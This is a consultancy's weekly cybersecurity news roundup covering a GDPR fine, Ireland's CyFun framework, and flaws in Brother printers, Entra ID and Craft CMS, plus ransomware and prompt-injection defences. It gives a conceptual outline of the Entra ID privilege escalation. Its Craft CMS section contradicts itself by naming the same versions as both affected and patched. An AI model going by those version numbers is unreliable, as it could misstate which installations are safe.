In this weeks cybersecurity news, organisations across sectors, from education to enterprise tech, have been confronted with both new risks and regulatory shifts. In Ireland, the City of Dublin Education and Training Board faces a hefty €125,000 fine after failing to safeguard sensitive student grant data, while the country simultaneously launches a national cybersecurity framework inspired by NIST standards to boost organisational resilience.

Meanwhile, vulnerabilities in popular technologies have raised alarm bells worldwide. A critical flaw affecting millions of Brother printers, a privilege escalation loophole in Microsoft Entra ID, and a high-risk remote code execution (RCE) vulnerability in Craft CMS underscore the urgent need for patching and proactive defence.

At the same time, threat actors are evolving. The newly identified Dire Wolf ransomware strain is targeting manufacturing and tech firms with devastating precision. In response to these growing threats, tech giants like Google are fortifying their GenAI platforms with multi-layered protections designed to prevent misuse and data leakage.

City of Dublin Education Board Fined €125K for Failing to Secure Student Grant Data

The Irish Data Protection Commission (DPC) has reprimanded the City of Dublin Education and Training Board (CDETB) after discovering malware on its web server and the retention of sensitive student grant data covering about 13,000 applicants from 2017 to 2018, without proper security measures. The compromised information included names, dates of birth, PPS numbers, contact details, and even health and ethnic data.

The DPC noted that CDETB violated GDPR Articles 5, 32, 33, and 34 by failing to implement adequate security, promptly report the breach to the DPC, and notify affected individuals. As a result, CDETB has been fined €125,000 and ordered to strengthen its data protection practices.

The DPC emphasised that public bodies must assess data risks, implement protective measures, and adhere to breach notification requirements

Ireland Launches A NIST Based Cybersecurity Framework to Support Compliance

Ireland’s National Cyber Security Centre (NCSC) has introduced CyberFundamentals (CyFun), a voluntary, risk-based cybersecurity maturity framework aligned with the NIST Cybersecurity Framework v1.1 (upgrading to v2.0 by Q3 2025).

Co-owned with Belgium, CyFun offers tiered assessments tailored to an organisation’s size, sector, and NIS2-related risk exposure.

It assists entities in implementing essential cybersecurity functions and positions CyFun certification as a credible route to demonstrating NIS2 compliance.

NCSC recommends adopting CyFun to build structured, evidence based cyber controls that support regulatory obligations and foster trust across supply chains.

Millions of Brother Printers Affected by Critical Vulnerability

A critical vulnerability in many Brother products allows attackers to retrieve or reset default admin credentials, leading to full device compromise. With a CVSS score of 9.8, this flaw cannot be fully patched by users, meaning the devices remain exposed even with firmware updates.

Security teams are advised to isolate these printers from internet access, implement network segmentation, and monitor for unusual activity.

Entra ID Flaw Lets Guests Hijack Subscriptions and Escalate Privileges

A serious design oversight in Microsoft Entra ID allows invited guest users to create and transfer their own Azure subscriptions into a tenant, gaining full “Owner” privileges without directory admin roles.

Attackers only need a billing permissioned account in their home tenant, then they invite themselves as guests in the target tenant, create a subscription and automatically receive high-level RBAC rights within the new environment. Once privileged, they can weaken tenant policies, list administrators, register managed identities, and exploit device-based conditional access, all under the radar.

To mitigate this hidden risk, organisations must enforce subscription policies to block guest subscriptions, audit guest users, and monitor for unexpected subscription activity.

Google Adds Multi-Layered Defences to Secure GenAI

Google has introduced advanced “layered” security controls into its Generative AI systems, including Gemini, to defend against indirect prompt injections. This is a growing threat whereby attackers embed malicious commands within external data sources like emails, documents, or calendar invites.

The multilayered strategy includes AI prompt classifiers, “spotlighting” markers to steer models away from malicious content, markdown sanitisation, suspicious URL redaction via Safe Browsing, mandatory user confirmations for risky actions, and real-time alerts to users. These safeguards collectively elevate the cost and complexity for adversaries aiming to exploit AI systems.

Despite increased sophistication, Google cautions that attackers continue to develop adaptive prompt injection techniques, underscoring the ongoing need for “defense in depth.”

Dire Wolf Ransomware Emerges as High Impact Threat to Manufacturing and Tech Firms

A new Dire Wolf ransomware strain is targeting technology and manufacturing sectors with devastating effect, employing a combination of file encryption, data theft, and public data-leak extortion tactics.

Victims discover their files renamed with a .direwolf extension and receive a ransom note threatening public disclosure unless payment is made promptly.

Analysts emphasise that rapid identification and immediate isolation of infected systems are vital. Recovery requires full device restoration from offline backups, as decryption without paying the ransom is usually not feasible.

Critical RCE Flaw in Craft CMS Patched After High-Risk Exposure

The NCSC has issued a TLP:CLEAR advisory for CVE‑2025‑32432, a critical remote code execution vulnerability in Craft CMS versions 3.0.0‑RC1 to 3.9.15, 4.0.0‑RC1 to 4.14.15, and 5.0.0‑RC1 to 5.6.17 with a CVSS score of 10.0. Attackers could exploit an insecure deserialisation in the Asset Transform process to execute arbitrary code without authentication.

Patches were released in Craft CMS versions 3.9.15, 4.14.15, and 5.6.17, fixing this flaw along with a related Yii framework issue github.com.

The NCSC strongly recommends immediate patching following thorough testing to prevent potential compromise of CMS environments .

If you would like to discover how Secora Consulting can assist you in keeping your business secure, please get in touch by filling out the form below 👇.